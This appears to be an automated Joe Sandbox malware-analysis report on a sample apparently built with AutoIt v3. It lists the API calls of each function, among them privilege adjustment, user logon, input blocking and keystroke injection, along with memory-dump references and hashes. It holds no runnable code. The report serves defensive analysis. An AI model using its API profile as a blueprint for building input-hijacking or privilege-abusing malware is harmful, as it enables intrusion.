                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($|
                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                • Opcode ID: fde2d8f1de562bd9caf73981aadedfb4b1ffd4f6ce9c9699f85f9ca3eac20b51
                                                                                                                • Instruction ID: 465a0f8c3edf1694dce471dcebe18dad06a4fc0b6067d632149281613e7d9f79
                                                                                                                • Opcode Fuzzy Hash: fde2d8f1de562bd9caf73981aadedfb4b1ffd4f6ce9c9699f85f9ca3eac20b51
                                                                                                                • Instruction Fuzzy Hash: FB320475A10605DFC728CF6AC480A6AB7F1FF48320B55C46EE89ADB3A1E770E951CB44
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 0021AE5E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3265722593-0
                                                                                                                • Opcode ID: dfdfa9de4cacddecd83633794363728d901b4c966fa01e4276e1fc52b812d0c2
                                                                                                                • Instruction ID: ce02dd21545eb7befe7c2c3b64b2810a36362fd26bff45ffafe70a8f106f0ea6
                                                                                                                • Opcode Fuzzy Hash: dfdfa9de4cacddecd83633794363728d901b4c966fa01e4276e1fc52b812d0c2
                                                                                                                • Instruction Fuzzy Hash: 19A18B6403A202BADF28AF285D99DFF39DDEB62340B108139F506D2193C965CCF196B3
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00254A1E,00000000), ref: 002555FD
                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00255629
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0024EA95
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0024EAEF
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0024EB3C
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023BF0F
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0023BF3C
• GetLastError.KERNEL32 ref: 0023BF49
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0024704C
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0024708D
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00247098
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0023BE5A
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0023BE71
• FreeSid.ADVAPI32(?), ref: 0023BE81
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• GetFileAttributesW.KERNEL32(0020C848,0020C848), ref: 0021DDA2
• FindFirstFileW.KERNEL32(0020C848,?), ref: 00274A83
Similarity
• API ID: File$AttributesFindFirst
• String ID:
• API String ID: 4185537391-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0024FD71
• FindClose.KERNEL32(00000000), ref: 0024FDA1
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0025C2E2,?,?,00000000,?), ref: 0024D73F
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0025C2E2,?,?,00000000,?), ref: 0024D751
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00244B89
• keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00244B9C
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0023B9EC), ref: 0023B8C5
                                                                                                                • CloseHandle.KERNEL32(?,?,0023B9EC), ref: 0023B8D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                • Opcode ID: a0810cec05cdc452377412fa0b643c66380ce327a9a48f2feb4a8c1a86fdcbd6
                                                                                                                • Instruction ID: 6748be30d011909391117350321647df6dca1e20c2c7e0a6214fc0acea5cb304
                                                                                                                • Opcode Fuzzy Hash: a0810cec05cdc452377412fa0b643c66380ce327a9a48f2feb4a8c1a86fdcbd6
                                                                                                                • Instruction Fuzzy Hash: F1E0BF75014511AFE7262B50FC49DB677E9EF04311B148419F55985471D7616CA4DB10
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0020125D,00227A43,00200F35,?,?,00000001), ref: 00228E41
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00228E4A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 769b481ae70e0829195d329a25f3df673f55cb6e363b9d9209429c51b74a94b1
                                                                                                                • Instruction ID: c5a566ad4afa275f895ac55fa96596efbed91de2e148666bd3da473b157ed8db
                                                                                                                • Opcode Fuzzy Hash: 769b481ae70e0829195d329a25f3df673f55cb6e363b9d9209429c51b74a94b1
                                                                                                                • Instruction Fuzzy Hash: 65B09275045B08ABEA002BA1FC0DB883F68EB08A62F0040A0F61D440A08B6354548F92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 3964851224-0
                                                                                                                • Opcode ID: fa839fd3a12e29de0f33668f36ac05921c11635159b047dbbbfaca66d02092fe
                                                                                                                • Instruction ID: bec5955022df2a8196b07c0e3f212cffe159c150fb59bcbcface235f781249a4
                                                                                                                • Opcode Fuzzy Hash: fa839fd3a12e29de0f33668f36ac05921c11635159b047dbbbfaca66d02092fe
                                                                                                                • Instruction Fuzzy Hash: BA927C70628341DFD724DF18C490BAAB7E1BF98304F14885DF98A8B292D771EDA5CB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8de9912d2d31376b1d9de71cb86809b5bd67b4fd76b472ea644f01bd12224e73
                                                                                                                • Instruction ID: 4845581dbe02c7899b0cc4ff74ccc9be741b87452b66835c93fb2db2a740b5b3
                                                                                                                • Opcode Fuzzy Hash: 8de9912d2d31376b1d9de71cb86809b5bd67b4fd76b472ea644f01bd12224e73
                                                                                                                • Instruction Fuzzy Hash: AE323431D39F515DDB239634E826335A28CAFB73C4F16D737E81AB5AA6EB28C4935100
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 323b74e5b2a4a136f923bd124e2641dbd07463d61d4ebafac7ec381e83b1621c
                                                                                                                • Instruction ID: bc503fb30411087136869e304c1e0c9b4437b9d89203da094a45cfe4e5026441
                                                                                                                • Opcode Fuzzy Hash: 323b74e5b2a4a136f923bd124e2641dbd07463d61d4ebafac7ec381e83b1621c
                                                                                                                • Instruction Fuzzy Hash: EEB1F420E3AF504DD72396399835336B65CAFBB2C5F91D71BFC1A74D62EB2185934280
                                                                                                                APIs
                                                                                                                • BlockInput.USER32(00000001), ref: 00257057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockInput
                                                                                                                • String ID:
                                                                                                                • API String ID: 3456056419-0
                                                                                                                • Opcode ID: 387a22fe6e308b4d68dd2f96d157431695075a83364b8d996b92c7f5e1f619df
                                                                                                                • Instruction ID: 44a1f5132437464150c0b318f79761ac544d6b61a910391cf95596e2de34dc7c
                                                                                                                • Opcode Fuzzy Hash: 387a22fe6e308b4d68dd2f96d157431695075a83364b8d996b92c7f5e1f619df
                                                                                                                • Instruction Fuzzy Hash: 70E0D8352202049FC710EF69E408D96F7ECAF54350F008426FD45C7291DAB0EC148B90
                                                                                                                APIs
                                                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00247DF8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mouse_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 2434400541-0
                                                                                                                • Opcode ID: cfd220181db6ffa6e4ffc7aaef629d84c3528a7059bb7dead00e66caf8405a5b
                                                                                                                • Instruction ID: c41454e37a57351f0d7c5573c3221f08bed32b285ef93d2b147f7ed7b58db97d
                                                                                                                • Opcode Fuzzy Hash: cfd220181db6ffa6e4ffc7aaef629d84c3528a7059bb7dead00e66caf8405a5b
                                                                                                                • Instruction Fuzzy Hash: 27D09EA597CA07F9FD2D1B209C2FF7A1208EB45781FA4568AB122C60C1EFD468645535
                                                                                                                APIs
                                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0023BA6A), ref: 0023BEB3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LogonUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244722697-0
                                                                                                                • Opcode ID: 68460f258b5b9b99fb5405b1627092cf1bb6811f9bf58bc73fa66ceddb2fa65a
                                                                                                                • Instruction ID: 1458a7464f2eb0506b8e24f20a8b62a3f9d9997f2a14e8507b336bc50935cbc6
                                                                                                                • Opcode Fuzzy Hash: 68460f258b5b9b99fb5405b1627092cf1bb6811f9bf58bc73fa66ceddb2fa65a
                                                                                                                • Instruction Fuzzy Hash: D1D05E320A460EAEDF024FA4EC06EAE3F6AEB04700F408110FA11C50A1C671D531AB50
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2645101109-0
                                                                                                                • Opcode ID: 476b9496c92282c833ad4be41feff487daeec81b90491e8cc353a9ffdc4d9c59
                                                                                                                • Instruction ID: 9c6ee13bb9f20f8111d7b7d904f281340b95b95eeecb405a3849445333f2479a
                                                                                                                • Opcode Fuzzy Hash: 476b9496c92282c833ad4be41feff487daeec81b90491e8cc353a9ffdc4d9c59
                                                                                                                • Instruction Fuzzy Hash: DDC04CB141500DDFCB15DB80D949AEFB7BCBB04300F104095A115E1040D7709B459B76
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00228E1F
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• GetProcessHeap.KERNEL32(00226AE9,002B67D8,00000014), ref: 0022A937
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
APIs
• DeleteObject.GDI32(00000000), ref: 0025A7A5
• DeleteObject.GDI32(00000000), ref: 0025A7B7
• DestroyWindow.USER32 ref: 0025A7C5
• GetDesktopWindow.USER32 ref: 0025A7DF
• GetWindowRect.USER32(00000000), ref: 0025A7E6
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0025A927
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0025A937
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025A97F
• GetClientRect.USER32(00000000,?), ref: 0025A98B
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0025A9C5
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025A9E7
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025A9FA
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AA05
• GlobalLock.KERNEL32(00000000), ref: 0025AA0E
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AA1D
• GlobalUnlock.KERNEL32(00000000), ref: 0025AA26
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AA2D
• GlobalFree.KERNEL32(00000000), ref: 0025AA38
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AA4A
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0028D9BC,00000000), ref: 0025AA60
• GlobalFree.KERNEL32(00000000), ref: 0025AA70
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0025AA96
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0025AAB5
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025AAD7
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0025ACC4
Strings
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
APIs
• SetTextColor.GDI32(?,00000000), ref: 0026D0EB
• GetSysColorBrush.USER32(0000000F), ref: 0026D11C
• GetSysColor.USER32(0000000F), ref: 0026D128
• SetBkColor.GDI32(?,000000FF), ref: 0026D142
• SelectObject.GDI32(?,00000000), ref: 0026D151
• InflateRect.USER32(?,000000FF,000000FF), ref: 0026D17C
• GetSysColor.USER32(00000010), ref: 0026D184
• CreateSolidBrush.GDI32(00000000), ref: 0026D18B
• FrameRect.USER32(?,?,00000000), ref: 0026D19A
• DeleteObject.GDI32(00000000), ref: 0026D1A1
• InflateRect.USER32(?,000000FE,000000FE), ref: 0026D1EC
• FillRect.USER32(?,?,00000000), ref: 0026D21E
• GetWindowLongW.USER32(?,000000F0), ref: 0026D249
  • Part of subcall function 0026D385: GetSysColor.USER32(00000012), ref: 0026D3BE
  • Part of subcall function 0026D385: SetTextColor.GDI32(?,?), ref: 0026D3C2
  • Part of subcall function 0026D385: GetSysColorBrush.USER32(0000000F), ref: 0026D3D8
  • Part of subcall function 0026D385: GetSysColor.USER32(0000000F), ref: 0026D3E3
  • Part of subcall function 0026D385: GetSysColor.USER32(00000011), ref: 0026D400
  • Part of subcall function 0026D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0026D40E
  • Part of subcall function 0026D385: SelectObject.GDI32(?,00000000), ref: 0026D41F
  • Part of subcall function 0026D385: SetBkColor.GDI32(?,00000000), ref: 0026D428
  • Part of subcall function 0026D385: SelectObject.GDI32(?,?), ref: 0026D435
  • Part of subcall function 0026D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0026D454
  • Part of subcall function 0026D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0026D46B
  • Part of subcall function 0026D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0026D480
  • Part of subcall function 0026D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0026D4A8
                                                                                                                Similarity
                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 3521893082-0
                                                                                                                • Opcode ID: 17780c77acff0538f27f42e3559fb49a0cd8d813b352a0c53381a2076c669d43
                                                                                                                • Instruction ID: 866b053d97cea4af39fb43f8f8e5c252a77824bde7f3390ba82fc183e4a518a1
                                                                                                                • Opcode Fuzzy Hash: 17780c77acff0538f27f42e3559fb49a0cd8d813b352a0c53381a2076c669d43
                                                                                                                • Instruction Fuzzy Hash: 9291DE76409305BFCB009F64EC0CE6BBBA9FF89320F500A19F966961E0C774D998CB52
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32 ref: 00204956
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00204998
                                                                                                                • DeleteObject.GDI32(00000000), ref: 002049A3
                                                                                                                • DestroyIcon.USER32(00000000), ref: 002049AE
                                                                                                                • DestroyWindow.USER32(00000000), ref: 002049B9
                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0027E179
                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0027E1B2
                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0027E5E0
                                                                                                                  • Part of subcall function 002049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00204954,00000000), ref: 00204A23
                                                                                                                • SendMessageW.USER32 ref: 0027E627
                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0027E63E
                                                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0027E654
                                                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0027E65F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 464785882-4108050209
                                                                                                                • Opcode ID: 23c66147aab03759c0b397bc0119f84ac3f0a3817137da7eaf756bfe0df9aa6d
                                                                                                                • Instruction ID: adc47bb455ae1cfe990921277b21222bf1ededf4dc7cc6c5c97b6389bc96efd2
                                                                                                                • Opcode Fuzzy Hash: 23c66147aab03759c0b397bc0119f84ac3f0a3817137da7eaf756bfe0df9aa6d
